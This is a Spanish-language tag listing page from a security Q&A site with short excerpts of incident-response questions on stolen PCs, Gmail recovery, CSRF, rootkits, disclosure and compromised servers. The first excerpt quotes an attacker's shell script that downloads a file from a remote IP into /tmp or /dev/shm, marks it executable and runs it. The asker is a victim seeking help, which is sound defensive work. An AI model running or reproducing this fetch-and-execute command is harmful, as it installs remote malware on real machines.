Preguntas con etiqueta 'incident-response'

3
respuestas

¿Qué hace esta secuencia de comandos sh si se ejecuta?

He interceptado un ataque en mi servidor web que creo que no tuvo éxito. El atacante intentó ejecutar este script: #!/bin/sh cd /tmp;cd /dev/shm wget -q http://221.132.37.26/xx -O ...x chmod +x ...x ./...x cd /dev/shm ; wget 221.132.37.26/ru...
hecha 15.03.2014 - 21:43
2
respuestas

Establecer rutinas sobre qué hacer si una PC es robada

Necesito establecer rutinas sobre cómo manejar el robo de equipos de PC, específicamente computadoras portátiles y máquinas estacionarias. También necesito averiguar cómo minimizar las consecuencias del equipo robado. Actualmente no existe ni...
hecha 16.12.2010 - 16:35
4
respuestas

Prevención y recuperación del hackeo de la cuenta de Gmail

Estoy haciendo una investigación sobre cómo evitar que mi cuenta de Gmail sea hackeada y cuáles son las opciones para reclamarla. El número de teléfono y el correo electrónico de recuperación asociados se pueden cambiar, de hecho espero que e...
hecha 05.06.2011 - 15:21
4
respuestas

He encontrado el código de ataque de JavaScript. ¿Cómo busco información sobre las características específicas del exploit?

Por lo tanto, hice clic en una invitación de LinkedIn de aspecto razonable, sin pensar en desplazarme por el enlace primero, ya que generalmente el cliente de correo electrónico me advierte sobre tales cosas. Una vez que me di cuenta de que a...
hecha 07.09.2013 - 11:11
5
respuestas

Los registros del servidor web muestran que alguien está intentando piratear mi sitio, ¿qué debo hacer?

Parece que alguien está intentando hackear mi sitio. Lo siguiente viene de mis archivos de registro de IIS: #Software: Microsoft Internet Information Services 7.5 #Version: 1.0 #Date: 2011-07-03 00:02:39 #Fields: date time s-sitename cs-method...
hecha 03.07.2011 - 21:33
3
respuestas

Divulgaciones responsables y ser demandado

Muchos sitios web como Google, Facebook, etc. reconocen a los hackers de White Hat en sus sitios por informar sobre la vulnerabilidad de la seguridad. Pero para el reportero de vulnerabilidad ¿está a salvo de la perspectiva legal? Además, ¿cómo...
hecha 09.05.2013 - 06:29
3
respuestas

¿Cómo debe responder una página web a un ataque CSRF?

Sé que utilizas tokens para prevenir CSRF, pero ¿cómo debería responder la página receptora cuando es atacada? ¿Debería fallar en silencio, fingiendo que la transacción fue exitosa? ¿Mostrar un mensaje de error? ¿Registrar el ataque? Por favo...
hecha 28.10.2011 - 07:48
1
respuesta

Cómo fomentar la divulgación responsable (y reaccionar adecuadamente de lo contrario)

Como un programador concienzudo, pongo la seguridad como uno de los requisitos básicos de cada producto que desarrollo. Para evitar la introducción de fallas, promuevo una cultura de concientización (p. Ej., Me aseguro de que los miembros del eq...
hecha 19.06.2013 - 13:18
3
respuestas

Cómo verificar manualmente los rootkits en un servidor

¿Alguien tiene una lista general paso a paso sobre cómo intentar descubrir rootkits en un servidor Linux o Solaris? Estoy buscando para encontrar manualmente el rootkit, no por software automatizado. Por ejemplo: ¿Lugares para buscar a...
hecha 06.06.2011 - 16:05
7
respuestas

Si sospecho que mi servidor está en peligro, ¿debería desconectarlo de inmediato o no? ¿Desde el poder o la red?

Según Mandiant, no debes:    Error # 1: Ingresando de inmediato en "modo remediaton", también conocido como "Whack-A-Mole"   ... como se describe aquí: enlace ¿Hay escenarios en los que es prudente tomar medidas inmediatas desconectánd...
hecha 12.11.2010 - 10:08